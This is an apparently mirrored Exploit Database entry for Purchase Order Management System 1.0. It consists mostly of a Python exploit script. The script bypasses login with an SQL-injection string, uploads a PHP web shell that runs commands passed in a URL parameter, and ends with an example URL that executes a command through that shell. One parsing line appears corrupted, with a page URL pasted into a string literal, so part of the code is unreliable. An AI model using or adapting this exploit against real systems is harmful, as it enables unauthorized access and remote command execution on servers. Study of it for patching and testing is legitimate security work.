Purchase Order Management System 1.0 – Remote File Upload

• Exploit Database
• 41 阅读

• 作者： Aryan Chehreghani
  日期： 2021-09-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50292/

• # Exploit Title: Purchase Order Management System 1.0 - Remote File Upload
  # Date: 2021-09-14 
  # Exploit Author: Aryan Chehreghani
  # Vendor Homepage: https://www.sourcecodester.com
  # Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
  # Version: v1.0
  # Tested on: Windows 10 - XAMPP Server 
  
  # [ About the Purchase Order Management System ] :
  #This Purchase Order Management System can store the list of all company's,
  #suppliers for easily retrieving the suppliers' data upon generating the purchase order.
  #It also stores the list of Items that the company possibly purchased from their suppliers.
  #Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. 
  #Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.
  
  #!/bin/env python3
  import requests
  import time
  import sys
  from colorama import Fore, Style
  if len(sys.argv) !=2:
  print ('''
  ########################################################### 
  #Purchase Order Management System 1.0 - Remote File Upload#
  #BY:Aryan Chehreghani #
  #Team:TAPESH DIGITAL SECURITY TEAM IRAN #
  # mail:aryanchehreghani@yahoo.com	#
  #-+-USE:python script.py <target url> # 
  # [+]Example:python3 script.py http://127.0.0.1/#
  ###########################################################
  ''')
  else:
  try:
  url = sys.argv[1]
  print()
  print('[*] Trying to login...')
  time.sleep(1)
  login = url + '/classes/Login.php?f=login'
  payload_name = "shell.php"
  payload_file = r"""<?php @system($_GET['tapesh']); ?>"""
  session = requests.session()
  post_data = {"username": "'=''or'", "password": "'=''or'"}
  user_login = session.post(login, data=post_data)
  cookie = session.cookies.get_dict()
  
  if user_login.text == '{"status":"success"}':
  print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')
  upload_url = url + "/classes/Users.php?f=save"
  cookies = cookie
  headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------221231088029122460852571642112", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/leave_system/admin/?page=user"}
  data = "-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nAdminstrator\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nAdmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\nadmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"img\"; filename=\"" + payload_name +"\"\r\nContent-Type: application/x-php\r\n\r\n\n " + payload_file + "\n\n\r\n-----------------------------221231088029122460852571642112--\r\n"
  print('[*] Trying to shell...')
  time.sleep(2)
  
  try:
  print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')
  upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)
  upload_check = f'{url}/uploads'
  r = requests.get(upload_check)
  if payload_name in r.text:
  
  payloads = r.text.split('<a href="https://www.exploit-db.com/exploits/50292/')
  for load in payloads:
  
  if payload_name in load:
  payload = load.split('"')
  payload = payload[0]
  else:
  pass
  else:
  exit()
  
  except:
  print ("Upload failed try again\n")
  exit()
  
  try:
  print("Check Your Target ;)\n")
  
  
  except:
  print("Failed to find shell\n")
  
  else:
  print("Login failed!\n")
  
  except:
  print("Something Went Wrong!\n")
  
  #########################################################
  #FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir